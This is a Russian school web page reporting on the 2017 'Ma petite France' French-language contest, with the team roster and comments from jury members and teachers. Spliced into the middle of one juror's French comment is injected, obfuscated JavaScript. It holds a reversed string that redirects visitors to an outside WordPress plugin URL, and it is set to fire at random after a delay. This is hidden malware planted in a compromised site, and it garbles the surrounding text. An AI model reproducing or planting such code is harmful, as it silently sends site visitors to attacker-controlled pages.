logo

Ma petite France 2017

Дорогие друзья!

11 февраля 2017 года в стенах нашей школы состоялся ежегодный конкурс «Моя маленькая Франция» (Ma petite France), который объединяет школы, предлагающие своим ученикам изучать французский язык как второй иностранный! И наша команда заняла на нем почетное 2ое место! Ура! Нашу школу представляла сборная команда 7-10 классов:

Ева Пономаренко

Ева Попова

Дарья Лапко

Евдокия Попова

Константин Шашков

Элина Фридман

Ксения Табачкова

Зарема Костоева

Дмитрий Дубровин

 

Конкурс мы проводим с 2005 года и его цель – в дружественной атмосфере погрузиться в культурное наследие Франции, найти нестандартные формы изучения французского языка и просто заинтересовать учеников. В этом году наш конкурс был посвящен французской литературе. Мы постарались, чтобы на конкурсе царил дух сотрудничества.

Вот некоторые впечатления и рефлексии, оставленные нам участниками, учителями и жюри конкурса:

 

Малеева Елена Александровна (жюри):

Было очень приятно присутствовать здесь. Я уже 2ой раз участвую в составе жюри на этом конкурсе. Хочу отметить что, уровень французского языка в этом году повысился по сравнению с прошлым годом, и организация стала намного лучше. Конкурс интересен тем, что он состоит из различных заданий достаточно интересных и оригинальных. Я уверена, что в следующем году будет больше команд и команды, и я желаю всем только успехов и удачи. Спасибо вам большое.»

 

Дутикова Евгения (жюри):

Merci d’être ici, pour cette ambiance chaleureuse et agréable. Nous ne sentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons pas que c’est une compétition mais c’est une rencontre des amis qui montrent ce qu’ils ont fait et bonne continuation. C’est très bien fait. Merci beaucoup.

 

Мельникова Елена Семеновна (учитель ЧОУ СОШ «Светлые горы»):

Nous sommes complétement contents aujourd’hui. Merci à vous, merci à votre école. Les règles sont un peu difficiles parce que c’est 2ème langue vivante et c’est difficile de préparer l’équipe.

 

 

Спасибо всем! Ждем Вас в следующем году на очередном конкурсе «Моя маленькая Франция»!

 



 

DSC_2347 DSC_2407 DSC_2428 DSC_2477 DSC_2486 DSC_2503 DSC_2517 DSC_2525 DSC_2559